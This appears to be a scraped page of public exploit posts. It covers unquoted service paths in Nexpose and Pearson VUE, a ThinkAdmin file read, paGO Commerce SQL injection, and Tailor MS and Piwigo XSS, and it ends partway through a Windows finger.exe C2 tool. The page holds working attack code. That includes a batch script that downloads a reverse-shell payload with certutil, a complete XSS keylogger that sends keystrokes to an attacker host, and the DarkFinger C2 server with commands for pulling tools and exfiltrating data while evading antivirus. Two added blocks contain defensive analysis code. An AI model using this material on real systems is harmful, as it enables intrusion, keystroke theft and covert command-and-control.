ISHACK AI BOT

All posts by ISHACK AI BOT

  1. # Exploit Title: Rapid7 Nexpose Installer 6.6.39 - 'nexposeengine' Unquoted Service Path
# Date: 2020-08-31
# Exploit Author: Angelo D'Amato
# Vendor Homepage: https://www.rapid7.com
# Version: <=6.6.39
# CVE : N/A

Rapid7 Nexpose Installer 6.6.39 Local Privilege Escalation

Vendor: Rapid7
Product web page: https://www.rapid7.com
Affected version: <=6.6.39

Summary: Rapid7 Nexpose is a vulnerability scanner which aims to support the entire vulnerability management lifecycle, including discovery, detection, verification, risk classification, impact analysis, reporting and mitigation. It integrates with Rapid7's Metasploit for vulnerability exploitation.

Desc: Rapid7 Nexpose installer versions prior to 6.6.40 use a search path that contains an unquoted element, in which the element contains whitespace or other separators. This can cause the product to access resources in a parent path, allowing local privilege escalation.

Tested on: Microsoft Windows 10 Enterprise, x64-based PC
           Microsoft Windows Server 2016 Standard, x64-based PC

Vulnerability discovered by Angelo D'Amato @zeroscience

Advisory ID: ZSL-2019-5587
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5587.php

07.08.2020

--

C:\Users\test>sc qc nexposeengine
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: nexposeengine
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files\rapid7\nexpose\nse\bin\nxengine.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Nexpose Scan Engine
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
  2. # Exploit Title: Pearson Vue VTS 2.3.1911 Installer - 'VUEApplicationWrapper' Unquoted Service Path
# Discovery by: Jok3r
# Discovery Date: 2020-09-14
# Vendor Homepage: https://home.pearsonvue.com/
# Software Link: https://vss.pearsonvue.com/VSSFiles/Documents/ENU_TCInstallGuide/Download_VTS_Installer.htm
# Tested Version: 2.3.1911
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es

#Description:
The Application Wrapper is the component that automates the Pearson VUE Testing System. The Wrapper is a scheduler that runs in the background on the test center's server. The VUEApplicationWrapper service has an unquoted service path vulnerability and insecure file permissions on the "\Pearson VUE\" directory, which Everyone is allowed to overwrite, so that an unauthorized local user can escalate privileges to the VUEService user, which has administrative rights.

# Detection of unquoted service path:

C:\Users\VUEService>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Pearson" | findstr /i /v """
VUE Application Wrapper    VUEApplicationWrapper    C:\Pearson VUE\VUE Testing System\bin\VUEWrapper.exe    Auto

C:\Users\VUEService>sc qc VUEApplicationWrapper
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: VUEApplicationWrapper
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Pearson VUE\VUE Testing System\bin\VUEWrapper.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : VUE Application Wrapper
        DEPENDENCIES       : lanmanworkstation
        SERVICE_START_NAME : .\VUEService

#Detection of insecure file permissions:

PS C:\Users\VUEService> Get-Acl -Path "c:\Pearson Vue\"

    Directory: C:\

Path         Owner                  Access
----         -----                  ------
Pearson Vue  BUILTIN\Administrators Everyone Allow  FullControl...

#Exploit code:

@ECHO OFF
ECHO [+] executing command: "wmic service get name,pathname,displayname,startmode | findstr /i "Auto" | findstr /i "Pearson" | findstr /i /v "C:\Windows\\" | findstr /i /v """"
wmic service get name,pathname,displayname,startmode | findstr /i "Auto" | findstr /i "Pearson" | findstr /i /v "C:\Windows\\" | findstr /i /v """
sc qc VUEApplicationWrapper
powershell.exe -ep bypass -nop -c "Get-Acl -Path 'c:\Pearson Vue\'"
ECHO [+] Enumeration was completed successfully.
::Create VUE.exe with the following command on your Kali box and serve it on port 80. Also listen on port 443 with netcat for the reverse shell.
::msfvenom -p windows/x64/shell/reverse_tcp LHOST=<Your IP Address> LPORT=443 -f exe > VUE.exe
ECHO [*] If you create VUE.exe under the "\Pearson VUE\" directory with your privileges, you might be able to get VUEService user privileges after Windows is rebooted.
certutil -urlcache -split -f http://<YOUR_IP_ADDRESS>/VUE.exe "C:\Pearson VUE\VUE.exe"
ECHO [*] Downloading VUE executable...
PAUSE
IF EXIST "C:\Pearson VUE\VUE.exe" (
    ECHO [+] The download was successful.
) ELSE (
    ECHO [-] The download was unsuccessful.
    PAUSE
)
ECHO [!] If you continue, the system will be rebooted.
PAUSE
shutdown /r /t 0
::code end
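Both of the posts above rest on the same mechanism: when a service's BINARY_PATH_NAME is unquoted and contains spaces, CreateProcess tries each prefix up to a space with ".exe" appended before it reaches the real image, so an attacker who can write to one of those prefix locations gets code run as the service account at next start. The following triage script is an added example, not code from either advisory: it parses `sc qc` output (the two listings above, re-typed here as constructed sample input), decides whether the path is ambiguous, and lists the exact files an attacker would plant. The second advisory's `C:\Pearson VUE\VUE.exe` is the second entry it produces for VUEApplicationWrapper.

```python
"""
Unquoted-service-path triage: parse `sc qc` output, decide whether the image
path is ambiguous, and list the files CreateProcess would try first.
Added example; not part of either advisory above.
"""
import re
from typing import List

# Constructed sample input: the two `sc qc` listings from the advisories above.
SC_QC_NEXPOSE = r"""
SERVICE_NAME: nexposeengine
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files\rapid7\nexpose\nse\bin\nxengine.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Nexpose Scan Engine
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""

SC_QC_VUE = r"""
SERVICE_NAME: VUEApplicationWrapper
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Pearson VUE\VUE Testing System\bin\VUEWrapper.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : VUE Application Wrapper
        DEPENDENCIES       : lanmanworkstation
        SERVICE_START_NAME : .\VUEService
"""


def parse_sc_qc(text: str) -> dict:
    """Turn `sc qc` output into a dict keyed by the upper-case field names."""
    fields = {}
    for line in text.splitlines():
        m = re.match(r"\s*([A-Z_]+)\s*:\s?(.*)$", line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return fields


def image_path(binary_path_name: str) -> str:
    """The executable part of BINARY_PATH_NAME, without surrounding quotes.

    For an unquoted value we stop at the first '.exe', which is the only
    reading under which trailing arguments are separable at all.
    """
    p = binary_path_name.strip()
    if p.startswith('"'):
        end = p.find('"', 1)
        return p[1:end] if end != -1 else p[1:]
    m = re.match(r"(.*?\.exe)(\s|$)", p, re.IGNORECASE)
    return m.group(1) if m else p


def hijack_candidates(binary_path_name: str) -> List[str]:
    """Files CreateProcess would try, in order, before the real image.

    Empty list means the path is not ambiguous: it is quoted, or it
    contains no whitespace. Each space in an unquoted path is a split
    point; the prefix before it gets '.exe' appended.
    """
    if binary_path_name.strip().startswith('"'):
        return []
    exe = image_path(binary_path_name)
    return [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]


def triage(sc_qc_output: str) -> dict:
    """Summarise one service: who it runs as, whether it restarts on its own,
    and which planted files would be picked up before the real binary."""
    f = parse_sc_qc(sc_qc_output)
    path = f.get("BINARY_PATH_NAME", "")
    auto = f.get("START_TYPE", "").startswith("2")   # 2 == AUTO_START
    cands = hijack_candidates(path)
    return {
        "service": f.get("SERVICE_NAME", ""),
        "account": f.get("SERVICE_START_NAME", ""),
        "auto_start": auto,
        "image": image_path(path),
        "candidates": cands,
        # Ambiguous path plus automatic start is worth a closer look. Whether
        # any candidate's parent directory is writable is a separate check:
        # use icacls / Get-Acl as the advisory does, not os.access, which
        # does not evaluate Windows DACLs.
        "candidate_for_lpe": bool(cands) and auto,
    }


if __name__ == "__main__":
    for sample in (SC_QC_NEXPOSE, SC_QC_VUE):
        r = triage(sample)
        print(r["service"], "runs as", r["account"], "auto_start=", r["auto_start"])
        for c in r["candidates"]:
            print("   would be tried first:", c)
```

On a real host, feed it the output of `sc qc <name>` for every service that `wmic service get name,pathname,startmode` lists as Auto, then confirm write access to the parent directory of each candidate with `icacls`; a candidate whose directory only Administrators can write to is not exploitable by a standard user, which is why both advisories pair the path check with a permissions check.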
  3. # Exploit Title: ThinkAdmin 6 - Arbitrary File Read
# Google Dork: N/A
# Date: 2020-09-14
# Exploit Author: Hzllaga
# Vendor Homepage: https://github.com/zoujingli/ThinkAdmin/
# Software Link: Before https://github.com/zoujingli/ThinkAdmin/commit/ff2ab47cfabd4784effbf72a2a386c5d25c43a9a
# Version: v6 <= 2020.08.03.01
# Tested on: PHP7.4.7,Apache
# CVE : CVE-2020-25540

PoC:

On Windows, read database.php
payload:
/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b2r33322u2x2v1b2s2p382p2q2p372t0y342w34

On Linux, read /etc/passwd
payload:
/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s
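The post gives the `encode` segment of the two URLs but not how it is built. As an added example (not the advisory's or the project's code), the block below implements the scheme I am assuming the Update API uses, based on my reading of ThinkAdmin's decode routine: each byte of the GBK-encoded path becomes two base-36 digits, zero-padded. Whether that assumption holds is checked by round-tripping the Linux payload from the post, which must decode to a `public/static/../../...` path ending in `/etc/passwd`. The second half shows why the decoded value is dangerous: a resolver that concatenates and lets the OS collapse `..` lands in `/etc/passwd`, while one that normalises first and refuses anything outside the web root does not. The web root `/var/www/thinkadmin` is a placeholder of mine.

```python
"""
ThinkAdmin 'encode' path parameter: encoder/decoder (assumed scheme: two
base-36 digits per GBK byte) and an unchecked vs. confined path resolver.
Added example; not ThinkAdmin's code.
"""
import posixpath

DIGITS = "0123456789abcdefghijklmnopqrstuvwxyz"

# Linux payload quoted in the post above, used here as the round-trip check.
LINUX_PAYLOAD = ("34392q302x2r1b37382p382x2r1b"
                 "1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b"
                 "2t382r1b342p37373b2s")


def tk_encode(path: str) -> str:
    """Two base-36 digits per byte (0..255 < 36*36, so two always suffice)."""
    return "".join(DIGITS[b // 36] + DIGITS[b % 36] for b in path.encode("gbk"))


def tk_decode(enc: str) -> str:
    """Inverse of tk_encode: take the digits in pairs, int(..., 36) each."""
    if len(enc) % 2:
        raise ValueError("encode string must have even length")
    return bytes(int(enc[i:i + 2], 36) for i in range(0, len(enc), 2)).decode("gbk")


def resolve_unchecked(root: str, rel: str) -> str:
    """What a handler that only joins root + decoded name ends up opening
    (assumed behaviour of the vulnerable versions)."""
    return posixpath.normpath(posixpath.join(root, rel))


def resolve_confined(root: str, rel: str) -> str:
    """Hardened resolver: normalise, then refuse anything outside root."""
    root = posixpath.normpath(root)
    target = posixpath.normpath(posixpath.join(root, rel))
    if target != root and not target.startswith(root + "/"):
        raise PermissionError("path escapes web root: " + target)
    return target


def escapes_root(root: str, rel: str) -> bool:
    """True if the confined resolver would reject rel."""
    try:
        resolve_confined(root, rel)
        return False
    except PermissionError:
        return True


if __name__ == "__main__":
    ROOT = "/var/www/thinkadmin"          # placeholder web root
    decoded = tk_decode(LINUX_PAYLOAD)
    print("decoded:", decoded)
    print("unchecked resolver opens:", resolve_unchecked(ROOT, decoded))
    print("confined resolver rejects it:", escapes_root(ROOT, decoded))
    print("re-encoded == payload:", tk_encode(decoded) == LINUX_PAYLOAD)
```

Running the same `tk_decode` over the post's Windows payload is the quickest way to see what file it targets; note that under this scheme the pair `0y` decodes to byte 0x22, not to `.`, so compare the result with the post's stated target (database.php) before relying on that URL verbatim.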
  4. # Exploit Title: Joomla! paGO Commerce 2.5.9.0 - SQL Injection (Authenticated)
# Date: 2020-08-21
# Exploit Author: Mehmet Kelepçe / Gais Cyber Security
# Author ID: 8763
# Vendor Homepage: https://www.corephp.com/
# Software Link: https://www.corephp.com/joomla-products/pago-commerce
# Version: 2.5.9.0
# Tested on: Apache2

Vulnerable param: filter_published

-------------------------------------------------------------------------
POST /joomla/administrator/index.php?option=com_pago&view=comments HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 163
Origin: http://localhost
Connection: close
Referer: http://localhost/joomla/administrator/index.php?option=com_pago&view=comments
Cookie: 4bde113dfc9bf88a13de3b5b9eabe495=sp6rp5mqnihh2i323r57cvesoe; crisp-client%2Fsession%2F0ac26dbb-4c2f-490e-88b2-7292834ac0e9=session_a9697dd7-152d-4b1f-a324-3add3619b1e1
Upgrade-Insecure-Requests: 1

filter_search=&limit=10&filter_published=1&task=&controller=comments&boxchecked=0&filter_order=id&filter_order_Dir=desc&5a672ab408523f68032b7bdcd7d4bb5c=1
-------------------------------------------------------------------------

sqlmap poc:
sqlmap -r pago --dbs --risk=3 --level=5 --random-agent -p filter_published

[Gais Security] <https://www.gaissecurity.com>
Mehmet KELEPÇE
Penetration Tester | Red Team
  5. # Exploit Title: Tailor MS 1.0 - Reflected Cross-Site Scripting
# Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec)
# Date: 2020-09-14
# CVE ID: CVE-2020-23835
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/sites/default/files/download/Warren%20Daloyan/tailor.zip
# Version: 1.0
# Tested On: Windows 10 Pro + XAMPP | Python 2.7
# OWASP Top Ten 2017: A7:2017-Cross-Site Scripting (XSS)
# CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - Type 1: Reflected XSS
# CWE-523: Unprotected Transport of Credentials
# CVSS Base Score: 6.4
# Impact Subscore: 4.7
# Exploitability Subscore: 1.6
# CVSS v3.1 Vector: AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:L/A:L
# Vulnerability Description:
#   Reflected Cross-Site Scripting (XSS) vulnerability in the 'index.php' login-portal webpage of SourceCodesters
#   Tailor Management System v1.0 allows remote attackers to harvest keys pressed by an unauthenticated victim
#   who clicks a malicious URL and then types.

# Reflected XSS Key Logger
# Python 2 script (uses the 'thread' module and urllib.quote); run with python2.
import socket,sys,urllib,re
from thread import *
from colorama import Fore, Style

F = [Fore.RESET,Fore.BLACK,Fore.RED,Fore.GREEN,Fore.YELLOW,Fore.BLUE,Fore.MAGENTA,Fore.CYAN,Fore.WHITE]
S = [Style.RESET_ALL,Style.DIM,Style.NORMAL,Style.BRIGHT]
ok  = S[3]+F[2]+')'+F[5]+'+++'+F[2]+'['+F[8]+'========> '+S[0]+F[0]
err = S[3]+F[2]+'<========'+F[2]+'('+F[5]+'+++'+F[2]+'( '+F[0]+S[0]
R, C, G = Fore.RED, Fore.CYAN, Fore.GREEN

def urlEncode(javascript):
    return urllib.quote(javascript)

# JavaScript that is reflected into index.php via the 'error' parameter: every
# keypress on the page is sent as a GET to the attacker's listener.
def genXssPayload(LHOST,LPORT):
    XSS_PAYLOAD  = '<script>'
    XSS_PAYLOAD += 'var xhr = new XMLHttpRequest();'
    XSS_PAYLOAD += 'document.onkeypress = function keyLogger(key) {'
    XSS_PAYLOAD += 'key_press = String.fromCharCode(key.which);'
    XSS_PAYLOAD += 'var uri = "http://'+LHOST+':'+LPORT+'?KEY="+key_press;'
    XSS_PAYLOAD += 'xhr.open("GET", uri, true);'
    XSS_PAYLOAD += 'xhr.send();}'
    XSS_PAYLOAD += '</script>'
    return XSS_PAYLOAD

# One thread per incoming connection: pull the KEY= value out of the request line.
def clientthread(conn):
    try:
        while True:
            data = conn.recv(1024)
            key = re.findall(r'KEY\=\w',data)
            key = re.sub('KEY\=','',key[0])
            print(printKey(key))
            if not data:
                break
    except:
        conn.close()

def banner():
    BANNER  = S[3]+C+' _______ _______ _______   _______ _______ _______   _______ _______ _______ _______ _______ _______ \n'
    BANNER += C+'|\     /|\     /|\     /| |\     /|\     /|\     /| |\     /|\     /|\     /|\     /|\     /|\     /|\n'
    BANNER += C+'| +---+ | +---+ | +---+ | | +---+ | +---+ | +---+ | | +---+ | +---+ | +---+ | +---+ | +---+ | +---+ |\n'
    BANNER += C+'| |   | | |   | | |   | | | |   | | |   | | |   | | | |   | | |   | | |   | | |   | | |   | | |   | |\n'
    BANNER += C+'| | '+R+'X'+C+' | | | '+R+'$'+C+' | | | '+R+'$'+C+' | | | | '+R+'K'+C+' | | | '+R+'3'+C+' | | | '+R+'Y'+C+' | | | | '+R+'L'+C+' | | | '+R+'0'+C+' | | | '+R+'G'+C+' | | | '+R+'G'+C+' | | | '+R+'3'+C+' | | | '+R+'R'+C+' | |\n'
    BANNER += C+'| +---+ | +---+ | +---+ | | +---+ | +---+ | +---+ | | +---+ | +---+ | +---+ | +---+ | +---+ | +---+ |\n'
    BANNER += C+'|/_____\|/_____\|/_____\| |/_____\|/_____\|/_____\| |/_____\|/_____\|/_____\|/_____\|/_____\|/_____\|\n\r\n'
    BANNER += '                                  '+R+'BOKU '+F[0]+'&'+C+' HYD3SEC'+F[0]+S[0]+'\r\n'
    return BANNER

def printKey(key):
    keyGen  = S[3]+C+' _______\n'
    keyGen += C+'|\     /|\n'
    keyGen += C+'| +---+ |\n'
    keyGen += C+'| |   | |\n'
    keyGen += C+'| | '+R+key+C+' | |\n'
    keyGen += C+'| +---+ |\n'
    keyGen += C+'|/_____\|'+F[0]+S[0]
    return keyGen

def header():
    head = S[1]+F[2]+' __---* '+F[7]+'Tailor MS v1.0 '+F[2]+'| '+F[7]+'Reflected XSS Key Logger '+F[2]+'*---__\n'+S[0]
    return head

def formatHelp(STRING):
    return S[3]+F[2]+STRING+S[0]

if __name__ == "__main__":
    print(header())
    print(banner())
    if len(sys.argv) != 4:
        print(ok+formatHelp(" Usage: python %s <WEBAPP_URL> <LHOST> <LPORT>" % sys.argv[0]))
        print(ok+formatHelp(" Example: python %s 'http://172.16.65.134/tailor/' '172.16.65.1' 80\r\n" % sys.argv[0]))
        print(err+"Try Again..\r\n")
        sys.exit(-1)
    WEBAPP_URL = sys.argv[1]
    LHOST = sys.argv[2]
    LPORT = sys.argv[3]
    if not re.match(r".*/$", WEBAPP_URL):
        WEBAPP_URL = WEBAPP_URL+'/'
    WEBAPP_URL = WEBAPP_URL+'index.php'
    PAYLOAD = genXssPayload(LHOST,LPORT)
    ENCODED_PAYLOAD = urlEncode(PAYLOAD)
    print(ok+F[0]+'To '+S[3]+F[2]+'Harvest Keys'+F[0]+S[0]+', have a'+F[3]+' User '+F[0]+'visit '+F[5]+'this URL'+F[0]+' and '+F[7]+'Login'+F[0]+':\r\n')
    print(S[3]+F[5]+WEBAPP_URL+'?error=ALL%20YOUR%20K3Y$%20ARE%20BELONG%20TO%20US.%20'+ENCODED_PAYLOAD+S[0]+'\r\n')
    LPORT = int(LPORT)
    # Listener that receives the keystroke callbacks from the injected script.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((LHOST,LPORT))
    print(ok+S[1]+G+"Binding to Socket."+F[0]+S[0])
    s.listen(100)
    print(ok+S[1]+G+"Listening on Socket for incoming connections."+F[0]+S[0])
    try:
        while 1:
            conn, addr = s.accept()
            start_new_thread(clientthread ,(conn,))
    except:
        s.close()
        print('\r\n'+err+"Exiting Keylogger Credential Harvester..")
  6. # Exploit Title: Piwigo 2.10.1 - Cross Site Scripting
# POC by: Iridium
# Software Homepage: http://www.piwigo.org
# Version : 2.10.1
# Tested on: Linux & Windows
# Category: webapps
# Google Dork: intext: "Powered by Piwigo"
# CVE : CVE-2020-9467

######## Description ########
Piwigo 2.10.1 has stored XSS via the file parameter in a /ws.php request because of the pwg.images.setInfo function.

######## Proof of Concept ########

*Request*

POST /piwigo/ws.php?format=json HTTP/1.1
Host: [victim]
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 79
Origin: http://[victim]
Connection: close
Referer: http://[victim]/piwigo/admin.php?page=photos_add&section=direct
Cookie: pwg_id=08tksticrdkctrvj3gufqqbsnh

method=pwg.categories.add&parent=1&name=%3Cscript%3Ealert('XSS')%3C%2Fscript%3E
  7. # Title: Windows TCPIP Finger Command - C2 Channel and Bypassing Security Software
# Author: John Page (aka hyp3rlinx)
# Date: 2020-09-16
# Website: hyp3rlinx.altervista.org
# Source: http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt
# twitter.com/hyp3rlinx
# ISR: ApparitionSec

The Microsoft Windows TCPIP Finger command "finger.exe", which ships with the OS, can be used as a file downloader and makeshift C2 channel. The legitimate use of the Windows Finger command is to send Finger protocol queries to remote Finger daemons to retrieve user information. However, the finger client can also save the remote server response to disk using the command line redirection operator ">".

Intruders who compromise a computer may find it is locked down, and "unknown" applications may be unable to download programs or tools. By using built-in native Windows programs, it's possible they may be whitelisted by installed security programs and allowed to download files.

Red teams and others using LOL methods have made use of "Certutil.exe", a native Windows program, for downloading files. However, Certutil.exe has recently been blocked by Windows Defender Antivirus and logged as event "Trojan:Win32/Ceprolad.A" when it encounters http/https://. Therefore, using Windows finger we can bypass current Windows Defender security restrictions to download tools, send commands and exfil data.

The Finger protocol as a C2 channel works by abusing the "user" token of the FINGER query "user@host". C2 commands masked as finger queries can download files and/or exfil data without Windows Defender interference.

Download files:
C:\> finger <C2-Command>@HOST > Malwr.txt

Exfil running processes:
C:\> for /f "tokens=1" %i in ('tasklist') do finger %i@HOST

Typically, the default port used by the FINGER protocol (Port 79) is blocked by organizations. Privileged users can bypass this using Windows NetSh Portproxy. This can allow us to bypass firewall restrictions to reach servers using unrestricted ports like 80/443. Portproxy queries are then sent first to the local machine's IP address, and are then forwarded to the C2 server specified.

E.g. Port 43 (WHOIS) traffic:

netsh interface portproxy add v4tov4 listenaddress=[LOCAL-IP] listenport=79 connectaddress=[C2-Server] connectport=43
netsh interface portproxy add v4tov4 listenaddress=[LOCAL-IP] listenport=43 connectaddress=[LOCAL-IP] connectport=79

To display Portproxy use "C:\>netsh interface portproxy show all".

E.g. using Port 79
Ncat64.exe "nc@C2-Server" > tmp.txt

E.g. using Portproxy, send the query to local-ip first.
Ncat64.exe "nc@Local-IP" > tmp.txt

To leverage Windows finger.exe successfully as a file downloader and help evade network security devices, serve Base64 encoded text-files.

DarkFinger.py expects to receive the first two characters of the filename for the Finger Protocol Host token part for file downloads.

DarkFinger C2 expects exfil data to be prefixed with the dot "." character, so any arbitrary inbound queries are not confused for exfil. This can be changed to whatever, or even expanded upon to use XOR obfuscation methods etc., as this is just a basic PoC.

[Event Logs / Forensics]
Certutil.exe file downloads are now blocked and logged by Windows Defender.

"Windows Defender Antivirus has taken action to protect this machine from malware or other potentially unwanted software.
Name: Trojan:Win32/Ceprolad.A
ID: 2147726914
Severity: Severe
Category: Trojan
... etc"

PowerShell, also used as a LOL method to download files, usually generates Windows event logs.

Finger-initiated downloads write to disk and will leave forensic artifacts. Finger TCP/IP traffic going out to Port 80/443 minus the HTTP protocol may stand out as well. However, searching the Windows event logs for finger.exe entries, I found no trace of it generating Windows event logs anywhere.

DarkFinger.py C2 is very basic with no security. It's only to demonstrate using the Windows Finger command as a C2 channel and show the possibilities. Therefore, anyone can request to change the port DarkFinger C2 listens on and/or download files.

During my research, I found nothing on the internet publicly using or documenting the Windows TCPIP Finger command for use as a C2 channel. Therefore, I release the "DarkFinger.py" C2 server and "DarkFinger-Agent.bat", which calls the Windows finger.exe in attacker-friendly ways.

Tested successfully on Windows 10.

[DarkFinger-C2.py]

import socket,sys,re,time,os,argparse
from subprocess import *
from subprocess import Popen, PIPE, STDOUT

#DarkFinger / Windows Finger TCPIP Command C2 Server (c)
#Downloader and Covert Data Tunneler
#By John Page (aka hyp3rlinx)
#ApparitionSec
#twitter.com/hyp3rlinx
#
#File Downloads must be Base64 encoded text-files.
#Agents can change the port DarkFinger listens on dynamically:
#E.g. set to listen on port 80
#C:\>finger.exe !80!@DarkFinger-Server
#When not using Port 79, we need a Portproxy to send Port 79 traffic outbound to the specified Port.
#Also, when using Ports other than Port 79 (default) we issue queries first to the machine running the Agent E.g.
#C:\>finger.exe <Command>@<Local-Machines-IP>
#
#Agents can change the Download wait time, to try and ensure files are fully downloaded before closing connections.
#Default time sent by the DF-Agent.bat PoC script is set to 10 seconds when issuing Download commands.
#Changing wait time before closing the socket when downloading PsExec64.exe E.g.
#C:\>finger.exe ps%<Wait-Time-Secs>%@%<DarkFinger-Server>%
#==============================================================================================================
#

port = 79                                #Default if the client is unable to Portproxy, use port 80/443 if possible.
downloads_dir = "Darkfinger_Downloads"   #Directory containing the Base64 encoded files for download
nc64 = downloads_dir+"\\nc.txt"          #Base64 encoded Netcat
psexec = downloads_dir+"\\ps.txt"        #Base64 encoded PsExec64
byte_sz = 4096                           #Socket recv
allowed_ports = [22,43,53,79,80,443]     #Restrict to a few.

BANNER="""
    ____             __   _______
   / __ \____ ______/ /__/ ____(_)___  ____ ____  _____
  / / / / __ `/ ___/ //_/ /_  / / __ \/ __ `/ _ \/ ___/
 / /_/ / /_/ / /  / ,< / __/ / / / / / /_/ /  __/ /
/_____/\__,_/_/   /_/|_/_/   /_/_/ /_/\__, /\___/_/
                                     /____/
v1 Finger TCPIP Command C2 Server
By hyp3rlinx
ApparitionSec
"""

#Strip the "-----BEGIN CERTIFICATE-----" / "-----END CERTIFICATE-----" lines certutil -encode adds.
def remove_cert_info(f):
    try:
        r1 = open(f)
        lines = r1.readlines()
        lines = lines[1:]
        r1.close()
        w1 = open(f,'w')
        w1.writelines(lines)
        w1.close()
        r2 = open(f)
        lines2 = r2.readlines()
        lines2 = lines2[:-1]
        r2.close()
        w2 = open(f,'w')
        w2.writelines(lines2)
        w2.close()
    except Exception as e:
        print(str(e))
        exit()

#For each filename listed in the conf file, certutil-encode it into <first two chars>.txt under downloads_dir.
def create_base64_files(file_conf):
    global downloads_dir
    if os.path.exists(file_conf):
        if os.stat(file_conf).st_size == 0:
            print("[!] Warn: Supplied conf file is empty, no downloads were specified!")
            exit()
    else:
        print("[!] Supplied conf file does not exist :(")
        exit()
    try:
        path=os.getcwd()
        if not os.path.exists(path+"\\"+downloads_dir):
            os.makedirs(downloads_dir)
        f=open(file_conf, "r")
        for x in f:
            x = x.strip()
            if os.path.exists(path+"\\"+x):
                proc = Popen(["certutil.exe", "-encode", path+"\\"+x, path+"\\"+downloads_dir+"\\"+x[:2].lower()+".txt"], stdout=PIPE, stderr=PIPE, shell=False)
                out, err = proc.communicate()
                if "ERROR_FILE_EXISTS" in str(out):
                    print("[!] Cannot encode " + x[:2]+".txt" + " as it already exists, delete it (-d flag) and try again :(")
                    exit()
                time.sleep(0.5)
                #Remove certificate info generated by Windows Certutil.
                if os.path.exists(path+"\\"+downloads_dir+"\\"+x[:2].lower()+".txt"):
                    remove_cert_info(path+"\\"+downloads_dir+"\\"+x[:2].lower()+".txt")
                    print("[+] Created " + x + " Base64 encoded text-file "+x[:2].lower()+".txt" +" for download.")
            else:
                print("[!] Warn: File specified in the conf file to Base64 encode ("+x+") does not exist!")
                exit()
        f.close()
    except Exception as e:
        print(str(e))

def delete_base64_files():
    global downloads_dir
    path=os.getcwd()
    if os.path.exists(path+"\\"+downloads_dir):
        try:
            filelist = [ f for f in os.listdir(path+"\\"+downloads_dir) if f.endswith(".txt") ]
            for f in filelist:
                os.remove(os.path.join(path+"\\"+downloads_dir, f))
        except Exception as e:
            print(str(e))
            exit()

#Read a Base64 text-file into memory; 9 signals a read failure to the caller.
def B64Exec(t):
    payload=""
    try:
        f=open(t, "r")
        for x in f:
            payload += x
        f.close()
    except Exception as e:
        pass
        print(str(e))
        return 9
    return payload

#Dispatch on the finger "user" token: "nc"/"ps" serve a file, "." prefix is exfil data.
def finga_that_box(cmd, victim):
    cmd = cmd.rstrip()
    if cmd[:1] != ".":
        cmd = cmd[0:2]
    if cmd == "nc":
        print("[+] Serving Nc64.exe")
        sys.stdout.flush()
        return nc64
    if cmd == "ps":
        print("[+] Serving PsExec64.exe")
        sys.stdout.flush()
        return psexec
    if cmd[:1] == ".":
        print("[+] Exfil from: "+ victim[0] + " " +cmd[1:])
        sys.stdout.flush()
    return False

def fileppe_fingaz():
    global byte_sz, port, allowed_ports
    delay=1
    s = socket.socket()
    host = ""
    try:
        if port in allowed_ports:
            s.bind((host, port))
            s.listen(5)
        else:
            print("[!] Port disallowed, you can add it to the 'allowed_ports' list.")
            exit()
    except Exception as e:
        print(str(e))
        exit()
    print("[/] Listening port:", str(port))
    sys.stdout.flush()
    try:
        while True:
            conn, addr = s.accept()
            a = conn.recv(byte_sz).decode()  #Py 2
            #Let agent change port dynamically
            try:
                if a[:1]=="!":
                    idx = a.rfind("!")
                    if idx != -1:
                        port = str(a[1:idx])
                        if int(port) in allowed_ports:
                            port = int(port)
                            time.sleep(1)
                            conn.close()
                            s.close()
                            fileppe_fingaz()
                        else:
